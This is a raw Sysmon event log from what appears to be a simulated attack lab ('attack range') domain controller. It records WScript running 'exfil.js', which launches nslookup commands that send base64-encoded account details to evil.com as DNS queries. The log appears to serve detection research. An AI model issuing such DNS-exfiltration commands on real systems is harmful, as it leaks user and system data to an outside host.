14:21:41.653{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212344Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.653{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-0645-000000005F02}6372C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212343Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.653{2E1864BB-18F5-629A-0445-000000005F02}58965724C:\Windows\system32\cmd.exe{2E1864BB-18F5-629A-0645-000000005F02}6372C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212342Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.654{2E1864BB-18F5-629A-0645-000000005F02}6372C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F5-629A-0445-000000005F02}5896C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcantz.tmp 2>&1 10341000x8000000000000000212341Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.622{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F5-629A-0545-000000005F02}3552C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212340Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.622{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F5-629A-0545-000000005F02}3552C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212339Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.607{2E1864BB-18F5-629A-0545-000000005F02}35526716C:\Windows\system32\conhost.exe{2E1864BB-18F5-629A-0445-000000005F02}5896C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212338Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.591{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-0545-000000005F02}3552C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212337Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.591{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212336Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.591{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212335Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.591{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212334Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.591{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212333Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.591{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-0445-000000005F02}5896C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212332Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.591{2E1864BB-18E0-629A-6742-000000005F02}39767044C:\Windows\System32\WScript.exe{2E1864BB-18F5-629A-0445-000000005F02}5896C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212331Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.598{2E1864BB-18F5-629A-0445-000000005F02}5896C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcantz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000212330Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.591{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlcefds.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000212329Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.569{2E1864BB-18F5-629A-0245-000000005F02}72006516C:\Windows\system32\conhost.exe{2E1864BB-18F5-629A-0345-000000005F02}5836C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212328Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.569{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212327Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.569{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212326Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.569{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212325Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.569{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212324Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.569{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-0345-000000005F02}5836C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212323Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.569{2E1864BB-18F5-629A-0145-000000005F02}75927864C:\Windows\system32\cmd.exe{2E1864BB-18F5-629A-0345-000000005F02}5836C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212322Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.577{2E1864BB-18F5-629A-0345-000000005F02}5836C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F5-629A-0145-000000005F02}7592C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcefds.tmp 2>&1 10341000x8000000000000000212321Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.553{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F5-629A-0245-000000005F02}7200C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212320Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.553{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F5-629A-0245-000000005F02}7200C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212319Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.553{2E1864BB-18F5-629A-0245-000000005F02}72006516C:\Windows\system32\conhost.exe{2E1864BB-18F5-629A-0145-000000005F02}7592C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212318Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.538{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-0245-000000005F02}7200C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212317Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.538{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212316Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.538{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212315Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.538{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212314Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.538{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 